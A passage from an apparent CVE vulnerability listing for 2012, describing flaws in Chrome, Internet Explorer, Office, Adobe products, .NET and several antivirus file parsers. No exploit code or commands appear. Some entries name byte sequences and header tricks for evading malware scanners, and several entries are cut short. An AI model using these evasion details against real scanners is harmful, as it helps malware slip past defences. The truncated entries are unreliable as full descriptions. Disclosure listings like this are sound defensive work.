Calligra and KOffice share the same codebase. [CVE-2012-3324] Directory traversal vulnerability in the UTL_FILE module in IBM DB2 and DB2 Connect 10.1 before FP1 on Windows allows remote authenticated users to modify, delete, or read arbitrary files via a pathname in the file field. [CVE-2012-2972] The (1) server and (2) agent components in CA ARCserve Backup r12.5, r15, and r16 on Windows do not properly validate RPC requests, which allows remote attackers to cause a denial of service (service crash) via a crafted request. [CVE-2012-2971] The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does not properly process RPC requests, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted request. [CVE-2012-2860] The date-picker implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2858] Buffer overflow in the WebP decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted WebP image. [CVE-2012-2857] Use-after-free vulnerability in the Cascading Style Sheets (CSS) DOM implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2856] The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger out-of-bounds write operations. [CVE-2012-2855] Use-after-free vulnerability in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2854] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to obtain potentially sensitive information about pointer values by leveraging access to a WebUI renderer process. [CVE-2012-2853] The webRequest API in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly interact with the Chrome Web Store, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2852] The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly handle object linkage, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted document. [CVE-2012-2851] Multiple integer overflows in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allow remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2850] Multiple unspecified vulnerabilities in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allow remote attackers to have an unknown impact via a crafted document. [CVE-2012-2849] Off-by-one error in the GIF decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted image. [CVE-2012-2848] The drag-and-drop implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to bypass intended file access restrictions via a crafted web site. [CVE-2012-2847] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not request user confirmation before continuing a large series of downloads, which allows user-assisted remote attackers to cause a denial of service (resource consumption) via a crafted web site. [CVE-2012-2816] Google Chrome before 20.0.1132.43 on Windows does not properly isolate sandboxed processes, which might allow remote attackers to cause a denial of service (process interference) via unspecified vectors. [CVE-2012-2764] Untrusted search path vulnerability in Google Chrome before 20.0.1132.43 on Windows might allow local users to gain privileges via a Trojan horse Metro DLL in the current working directory. [CVE-2012-2557] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "cloneNode Use After Free Vulnerability." [CVE-2012-2552] Cross-site scripting (XSS) vulnerability in the SQL Server Report Manager in Microsoft SQL Server 2000 Reporting Services SP2 and SQL Server 2005 SP4, 2008 SP2 and SP3, 2008 R2 SP1, and 2012 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Reflected XSS Vulnerability." [CVE-2012-2550] Microsoft Works 9 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted Word .doc file, aka "Works Heap Vulnerability." [CVE-2012-2549] The IP-HTTPS server in Windows Server 2008 R2 and R2 SP1 and Server 2012 does not properly validate certificates, which allows remote attackers to bypass intended access restrictions via a revoked certificate, aka "Revoked Certificate Bypass Vulnerability." [CVE-2012-2548] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Layout Use After Free Vulnerability." [CVE-2012-2546] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Event Listener Use After Free Vulnerability." [CVE-2012-2543] Stack-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 SP1 [CVE-2012-2539] Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2536] Cross-site scripting (XSS) vulnerability in Microsoft Systems Management Server 2003 SP3 and System Center Configuration Manager 2007 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Reflected XSS Vulnerability." [CVE-2012-2532] Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) processes unspecified commands before TLS is enabled for a session, which allows remote attackers to obtain sensitive information by reading the replies to these commands, aka "FTP Command Injection Vulnerability." [CVE-2012-2531] Microsoft Internet Information Services (IIS) 7.5 uses weak permissions for the Operational log, which allows local users to discover credentials by reading this file, aka "Password Disclosure Vulnerability." [CVE-2012-2528] Use-after-free vulnerability in Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2524] Microsoft Office 2007 SP2 and SP3 and 2010 SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Computer Graphics Metafile (CGM) file, aka "CGM File Format Memory Corruption Vulnerability." [CVE-2012-2523] Integer overflow in Microsoft Internet Explorer 8 and 9, JScript 5.8, and VBScript 5.8 on 64-bit platforms allows remote attackers to execute arbitrary code by leveraging an incorrect size calculation during object copying, aka "JavaScript Integer Overflow Remote Code Execution Vulnerability." [CVE-2012-2522] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a malformed virtual function table after this table's deletion, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability." [CVE-2012-2521] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Asynchronous NULL Object Access Remote Code Execution Vulnerability." [CVE-2012-2519] Untrusted search path vulnerability in Entity Framework in ADO.NET in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, and 4 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .NET application, aka ".NET Framework Insecure Library Loading Vulnerability." [CVE-2012-2493] The VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 2.x before 2.5 MR6 on Windows, and 2.x before 2.5 MR6 and 3.x before 3.0 MR8 on Mac OS X and Linux, does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code via vectors involving (1) ActiveX or (2) Java components, aka Bug ID CSCtw47523. [CVE-2012-2376] Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild in May 2012. [CVE-2012-2290] The client in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375 allows remote attackers to execute arbitrary code by sending a crafted message over a TCP communication channel. [CVE-2012-2287] The authentication functionality in EMC RSA Authentication Agent 7.1 and RSA Authentication Client 3.5 on Windows XP and Windows Server 2003, when an unspecified configuration exists, allows remote authenticated users to bypass an intended token-authentication step, and establish a login session to a remote host, by leveraging Windows credentials for that host. [CVE-2012-2284] The (1) install and (2) upgrade processes in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375, when Exchange Server is used, allow local users to read cleartext administrator credentials via unspecified vectors. [CVE-2012-2273] Comodo Internet Security before 5.10.228257.2253 on Windows 7 x64 allows local users to cause a denial of service (system crash) via a crafted 32-bit Portable Executable (PE) file with a kernel ImageBase value. [CVE-2012-2051] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-2050] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-2049] Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-2040] Untrusted search path vulnerability in the installer in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2039] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2038] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2037] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2036] Integer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2035] Stack-based buffer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2034] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2006] Unspecified vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to modify data or cause a denial of service via unknown vectors. [CVE-2012-2005] Cross-site scripting (XSS) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2004] Open redirect vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2003] Cross-site request forgery (CSRF) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. [CVE-2012-1943] Untrusted search path vulnerability in Updater.exe in the Windows Updater Service in Mozilla Firefox 12.0, Thunderbird 12.0, and SeaMonkey 2.9 on Windows allows local users to gain privileges via a Trojan horse wsock32.dll file in an application directory. [CVE-2012-1942] The Mozilla Updater and Windows Updater Service in Mozilla Firefox 12.0, Thunderbird 12.0, and SeaMonkey 2.9 on Windows allow local users to gain privileges by loading a DLL file in a privileged context. [CVE-2012-1925] Opera before 11.62 does not ensure that a dialog window is placed on top of content windows, which makes it easier for user-assisted remote attackers to trick users into downloading and executing arbitrary files via a download dialog located under other windows. [CVE-2012-1896] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly consider trust levels during construction of output data, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Code Access Security Info Disclosure Vulnerability." [CVE-2012-1895] The reflection implementation in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4 does not properly enforce object permissions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Reflection Bypass Vulnerability." [CVE-2012-1894] Microsoft Office for Mac 2011 uses world-writable permissions for the "Applications/Microsoft Office 2011/" directory and certain other directories, which allows local users to gain privileges by placing a Trojan horse executable file in one of these directories, aka "Office for Mac Improper Folder Permissions Vulnerability." [CVE-2012-1892] Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio Team Foundation Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "XSS Vulnerability." [CVE-2012-1889] Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site. [CVE-2012-1888] Buffer overflow in Microsoft Visio 2010 SP1 and Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file, aka "Visio DXF File Format Buffer Overflow Vulnerability." [CVE-2012-1887] Use-after-free vulnerability in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1, and Office 2008 and 2011 for Mac, allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel SST Invalid Length Use After Free Vulnerability." [CVE-2012-1886] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1885] Heap-based buffer overflow in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1882] Microsoft Internet Explorer 6 through 9 does not block cross-domain scrolling events, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Scrolling Events Information Disclosure Vulnerability." [CVE-2012-1881] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnRowsInserted Event Remote Code Execution Vulnerability." [CVE-2012-1880] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "insertRow Remote Code Execution Vulnerability." [CVE-2012-1879] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access an undefined memory location, aka "insertAdjacentText Remote Code Execution Vulnerability." [CVE-2012-1878] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnBeforeDeactivate Event Remote Code Execution Vulnerability." [CVE-2012-1877] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Title Element Change Remote Code Execution Vulnerability." [CVE-2012-1876] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka "Col Element Remote Code Execution Vulnerability," as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1875] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability." [CVE-2012-1874] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows user-assisted remote attackers to execute arbitrary code by accessing a deleted object, aka "Developer Toolbar Remote Code Execution Vulnerability." [CVE-2012-1873] Microsoft Internet Explorer 7 through 9 does not properly create and initialize string data, which allows remote attackers to obtain sensitive information from process memory via a crafted HTML document, aka "Null Byte Information Disclosure Vulnerability." [CVE-2012-1872] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to inject arbitrary web script or HTML via crafted character sequences with EUC-JP encoding, aka "EUC-JP Character Encoding Vulnerability." [CVE-2012-1862] Open redirect vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "SharePoint URL Redirection Vulnerability." [CVE-2012-1861] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Script in Username Vulnerability." [CVE-2012-1860] Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 do not properly check permissions for search scopes, which allows remote authenticated users to obtain sensitive information or cause a denial of service (data modification) by changing a parameter in a search-scope URL, aka "SharePoint Search Scope Vulnerability." [CVE-2012-1859] Cross-site scripting (XSS) vulnerability in scriptresx.ashx in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "XSS scriptresx.ashx Vulnerability." [CVE-2012-1858] The toStaticHTML API (aka the SafeHTML component) in Microsoft Internet Explorer 8 and 9, Communicator 2007 R2, and Lync 2010 and 2010 Attendee does not properly handle event attributes and script, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted HTML document, aka "HTML Sanitization Vulnerability." [CVE-2012-1857] Cross-site scripting (XSS) vulnerability in the Enterprise Portal component in Microsoft Dynamics AX 2012 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka "Dynamics AX Enterprise Portal XSS Vulnerability." [CVE-2012-1856] The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka "MSCOMCTL.OCX RCE Vulnerability." [CVE-2012-1855] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly handle function pointers, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Memory Access Vulnerability." [CVE-2012-1854] Untrusted search path vulnerability in VBE6.dll in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1849] Untrusted search path vulnerability in Microsoft Lync 2010, 2010 Attendee, and 2010 Attendant allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .ocsmeet file, aka "Lync Insecure Library Loading Vulnerability." [CVE-2012-1847] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1821] The Network Threat Protection module in the Manager component in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.700x on Windows Server 2003 allows remote attackers to cause a denial of service (web-server outage, or daemon crash or hang) via a flood of packets that triggers automated blocking of network traffic. [CVE-2012-1747] Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1746. [CVE-2012-1746] Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1747. [CVE-2012-1662] CA ARCserve Backup r12.0 through SP2, r12.5 before SP2, r15 through SP1, and r16 before SP1 on Windows allows remote attackers to cause a denial of service (service shutdown) via a crafted network request. [CVE-2012-1620] slock 0.9 does not properly handle the XRaiseWindow event when the screen is locked, which might allow physically proximate attackers to obtain sensitive information by pressing a button, which reveals the desktop and active windows. [CVE-2012-1545] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1539] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreePos Use After Free Vulnerability." [CVE-2012-1538] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CFormElement Use After Free Vulnerability." [CVE-2012-1535] Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on Windows and Mac OS X and before 11.2.202.238 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted SWF content, as exploited in the wild in August 2012 with SWF content in a Word document. [CVE-2012-1529] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "OnMove Use After Free Vulnerability." [CVE-2012-1526] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not initialized or (2) is deleted, aka "Layout Memory Corruption Vulnerability." [CVE-2012-1525] Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-1524] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Attribute Remove Remote Code Execution Vulnerability." [CVE-2012-1523] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Center Element Remote Code Execution Vulnerability." [CVE-2012-1522] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Cached Object Remote Code Execution Vulnerability." [CVE-2012-1459] The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1458] The Microsoft CHM file parser in ClamAV 0.96.4 and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via a crafted reset interval in the LZXC header of a CHM file. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CHM parser implementations. [CVE-2012-1457] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1453] The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. [CVE-2012-1443] The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. [CVE-2012-1441] The Microsoft EXE file parser in eSafe 7.0.17.0 and Prevx 3.0 allows remote attackers to bypass malware detection via an EXE file with a modified value in any of several e_ fields. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1438] The Microsoft Office file parser in Comodo Antivirus 7425 and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via an Office file with a ustar character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different Office parser implementations. [CVE-2012-1437] The Microsoft Office file parser in Comodo Antivirus 7425 allows remote attackers to bypass malware detection via an Office file with a \50\4B\53\70\58 character sequence at a certain location. [CVE-2012-1436] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \2D\6C\68 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1435] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \50\4B\4C\49\54\45 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1434] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \19\04\00\10 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published 